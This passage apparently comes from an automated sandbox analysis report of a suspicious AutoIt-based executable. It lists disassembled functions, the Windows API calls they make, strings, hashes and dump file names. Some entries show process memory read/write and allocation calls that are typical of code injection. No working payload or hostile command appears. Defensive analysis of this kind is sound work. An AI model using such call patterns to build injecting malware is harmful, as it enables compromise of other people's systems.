                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                        • CoInitialize.OLE32(00000000), ref: 0082B9BB
                                                        • CoCreateInstance.OLE32(00852D6C,00000000,00000001,00852BDC,?), ref: 0082B9D4
                                                        • CoUninitialize.OLE32 ref: 0082B9F1
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: 5489b64faa276818afc35a71149529cde48a3897550b381eee9fabff3656c868
                                                        • Instruction ID: d1c5d59ac27b71ce7265429fb908fd2bde9b181a323990ea9120c2e3bc6d4eec
                                                        • Opcode Fuzzy Hash: 5489b64faa276818afc35a71149529cde48a3897550b381eee9fabff3656c868
                                                        • Instruction Fuzzy Hash: F7A133756042159FCB00DF14C488E5ABBE5FF89324F14899CF99A9B3A2CB35EC85CB91
                                                        Function 007E501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 007E50AD
                                                          • Part of subcall function 007F00F0: __87except.LIBCMT ref: 007F012B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: ad78ec8116d3aae3ebf6147a29b690d3adbfb00f28521e16730109a34683f347
                                                        • Instruction ID: a5362611a7b6bbfc6d264643e4d8f4e493f987e106762c00c1aadd85eedd56fe
                                                        • Opcode Fuzzy Hash: ad78ec8116d3aae3ebf6147a29b690d3adbfb00f28521e16730109a34683f347
                                                        • Instruction Fuzzy Hash: 2D518820A0A64EC7DB117729CD0937E2B91BB44704F208D99F5D5863ABEF3C8DC49AC2
                                                        Function 00808584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: 3c}$_}
                                                        • API String ID: 4104443479-2413270705
                                                        • Opcode ID: a2b1d9661046c25d893e59da975f35318462a53e790b96c365c4915bdb074a0f
                                                        • Instruction ID: a17505961253ebb91279603695d685c298b8ec462dc9311e0f7f47da499a7a8e
                                                        • Opcode Fuzzy Hash: a2b1d9661046c25d893e59da975f35318462a53e790b96c365c4915bdb074a0f
                                                        • Instruction Fuzzy Hash: A5515EB0900619DFCF64CF68C884AAEB7F1FF45304F14852AE89AD7390EB35A995CB51
                                                        Function 008197F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 008214BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00819296,?,?,00000034,00000800,?,00000034), ref: 008214E6
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0081983F
                                                          • Part of subcall function 00821487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008192C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008214B1
                                                          • Part of subcall function 008213DE: GetWindowThreadProcessId.USER32(?,?), ref: 00821409
                                                          • Part of subcall function 008213DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0081925A,00000034,?,?,00001004,00000000,00000000), ref: 00821419
                                                          • Part of subcall function 008213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0081925A,00000034,?,?,00001004,00000000,00000000), ref: 0082142F
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008198AC
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008198F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: 0a9460f199ffc619a4e2a54879077b785cea137b33832ea375a9b224b41b01a9
                                                        • Instruction ID: f68aec738d9c2102e5dcd3c23d6aaa311ad47426717aae217abbb384f719fac3
                                                        • Opcode Fuzzy Hash: 0a9460f199ffc619a4e2a54879077b785cea137b33832ea375a9b224b41b01a9
                                                        • Instruction Fuzzy Hash: 09414F7690111CAECF10DFA4CC55ADEBBB8FF15300F104099FA49B7141DA716E85CBA1
                                                        Function 00847946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0084F910,00000000,?,?,?,?), ref: 008479DF
                                                        • GetWindowLongW.USER32 ref: 008479FC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00847A0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 9f0ba50bb58dbe93395e0c92900565c19908e885197c4b78d25b40822f400197
                                                        • Instruction ID: 8112e3ef48b540c77ca6738981700eca1dcdfb32014eee929a2bb3ef306dcd8e
                                                        • Opcode Fuzzy Hash: 9f0ba50bb58dbe93395e0c92900565c19908e885197c4b78d25b40822f400197
                                                        • Instruction Fuzzy Hash: 2B31EF3120420AAFDB119E38CC45BEA7BA9FB05324F208729F975E32E1D734ED518B50
                                                        Function 00847A71 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00847B61
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00847B76
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '$0R
                                                        • API String ID: 3850602802-3210545720
                                                        • Opcode ID: 61a1fd72cc30d7e0ebe20c248ae3a58780887b510aaaa2950e5b2171e5791041
                                                        • Instruction ID: 4879f5f319c1456ff6fa28eda6e1095b1618a0101c56791850296781e16fa583
                                                        • Opcode Fuzzy Hash: 61a1fd72cc30d7e0ebe20c248ae3a58780887b510aaaa2950e5b2171e5791041
                                                        • Instruction Fuzzy Hash: 8C41F974A0521E9FDB14CF68C981BEABBB5FF09314F10416AE904EB391D770A955CF90
                                                        Function 008473D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00847461
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00847475
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00847499
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: 63663eafe7b26bf98405a336c663dfb7368cd78b9549f3dfe930d13be9cb3e40
                                                        • Instruction ID: d9c9abfeb545a8aa568be41d0c1af138bcc42947cae024e246c9f728f613e4c7
                                                        • Opcode Fuzzy Hash: 63663eafe7b26bf98405a336c663dfb7368cd78b9549f3dfe930d13be9cb3e40
                                                        • Instruction Fuzzy Hash: DF219F3260021CABDF118E64CC46FEA3B69FB48724F110214FE55AB1D0DB75AC91DBA0
                                                        Function 00846CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00846D3B
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00846D4B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00846D70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: 55d29a6067a900355ed5c4525736b95130825f69a59badebaf8d61fa18aa12ae
                                                        • Instruction ID: ef8a3b234981873296cb388534ddb19492cea59c25f9f80d19792adf7398c024
                                                        • Opcode Fuzzy Hash: 55d29a6067a900355ed5c4525736b95130825f69a59badebaf8d61fa18aa12ae
                                                        • Instruction Fuzzy Hash: F621AF32601118AFDF118F54CC85FAB3BBAFB8A760F018128FA459B1A0D6719C6187A1
                                                        Function 0084770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00847772
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00847787
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00847794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: ebec46ec5175baecf3ddfcc018054a30e27711046d7021e3813521c3d6b0f0d7
                                                        • Instruction ID: 2b16a4be59f4bf66ca2f4975f50d5bf38b139f4adaeca6d9ec27e54bede40d2c
                                                        • Opcode Fuzzy Hash: ebec46ec5175baecf3ddfcc018054a30e27711046d7021e3813521c3d6b0f0d7
                                                        • Instruction Fuzzy Hash: 3C11E372244208BAEF205F65CC45FEB77A9FF89B64F12422CFA45E6191D772E811CB20
                                                        Function 0084ACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,008857B0,0084D809,000000FC,?,00000000,00000000,?,?,?,007FB969,?,?,?,?,?), ref: 0084ACD1
                                                        • GetFocus.USER32 ref: 0084ACD9
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • SendMessageW.USER32(00EDEDA8,000000B0,000001BC,000001C0), ref: 0084AD4B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                        • String ID: 0R
                                                        • API String ID: 3601265619-1916035689
                                                        • Opcode ID: 69d31e54f81f7ed42de1540d37a5513f2a14cbf906bfdd1b506c3354a63651e7
                                                        • Instruction ID: 95c4dfc877aca5cf8bafd22f72a97e81c4eb2d3a012ff30ab480552a4eeb1880
                                                        • Opcode Fuzzy Hash: 69d31e54f81f7ed42de1540d37a5513f2a14cbf906bfdd1b506c3354a63651e7
                                                        • Instruction Fuzzy Hash: 400192356025008FC714AF28D888B6677E6FB8A325F18027DF525CB2B1CB32AC46CB51
                                                        Function 007C4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C4B83,?), ref: 007C4C44
                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007C4C56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-1355242751
                                                        • Opcode ID: 7515d4dd651e3af492b861163d6ab6bff515c2bbdfcb842120a9f052c1a3a7e1
                                                        • Instruction ID: b986ee9bc2186d21012ad29b348ad88790c03eb823fbefe8dde8e07da5024bfd
                                                        • Opcode Fuzzy Hash: 7515d4dd651e3af492b861163d6ab6bff515c2bbdfcb842120a9f052c1a3a7e1
                                                        • Instruction Fuzzy Hash: 8ED01774910B13CFD7209F31D918B1A77E4FF06391B11C83EA6A6D6275E6B8D880CA60
                                                        Function 007C4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C4BD0,?,007C4DEF,?,008852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007C4C11
                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007C4C23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                        • API String ID: 2574300362-3689287502
                                                        • Opcode ID: 78e12185bd98fab3c48ffb2fd3a657e669e4aef24a8b5ea13faadae9e4ed5724
                                                        • Instruction ID: 3d1320bd334249d7d5dee7fe816f7397db77d3504dfb17b036fbb5905a8590b2
                                                        • Opcode Fuzzy Hash: 78e12185bd98fab3c48ffb2fd3a657e669e4aef24a8b5ea13faadae9e4ed5724
                                                        • Instruction Fuzzy Hash: 79D01774911713CFD730AF71D918A07BAE5FF0A392B11CC3EA596D6261E6B8D880CB60
                                                        Function 00840DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00841039), ref: 00840DF5
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00840E07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: 3a30354b3f47e2c5c8274fafe92e3f2ec0683615f8b7616f8f7ce0c3d1a49cb3
                                                        • Instruction ID: cc1f7f85811dc25ce340e531fe1fb0f633437a59869071ba4a464e0f218db264
                                                        • Opcode Fuzzy Hash: 3a30354b3f47e2c5c8274fafe92e3f2ec0683615f8b7616f8f7ce0c3d1a49cb3
                                                        • Instruction Fuzzy Hash: 23D08270800326CFC3218F70C80868376E4FF01352F00CC2ED69AC6250E6B4D8A0CA00
                                                        Function 008390E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00838CF4,?,0084F910), ref: 008390EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00839100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 5e619910e8eb82670e67d08287de2b841823e822353ba26dc030cd1d12153a81
                                                        • Instruction ID: 297cb393d322bff9e6085ba11e06b6ab76b4f3aeecf0c29f97b810bc98041d04
                                                        • Opcode Fuzzy Hash: 5e619910e8eb82670e67d08287de2b841823e822353ba26dc030cd1d12153a81
                                                        • Instruction Fuzzy Hash: 1DD01274550713CFD7209F31D81C50676D4FF06351F11C87DD5D5D6650EAB8C880CA90
                                                        Function 00801714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 1232d12e7e5a12a36d40c807d76b3d3f3318a5489d0ec97461bab9878d70abee
                                                        • Instruction ID: 1b112c98342958a6e4e955433060b09f30e63f0f895c3bb07992daa445c512a3
                                                        • Opcode Fuzzy Hash: 1232d12e7e5a12a36d40c807d76b3d3f3318a5489d0ec97461bab9878d70abee
                                                        • Instruction Fuzzy Hash: D2D0177294611CEBCF809A909C8CCB9737CFB09325F5404A6F506E2085E229CB94EA21
                                                        Function 0081717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ae90cd15117b204c5b69a17939e75c21d2bb03bcc187fc037dfb803df1be320
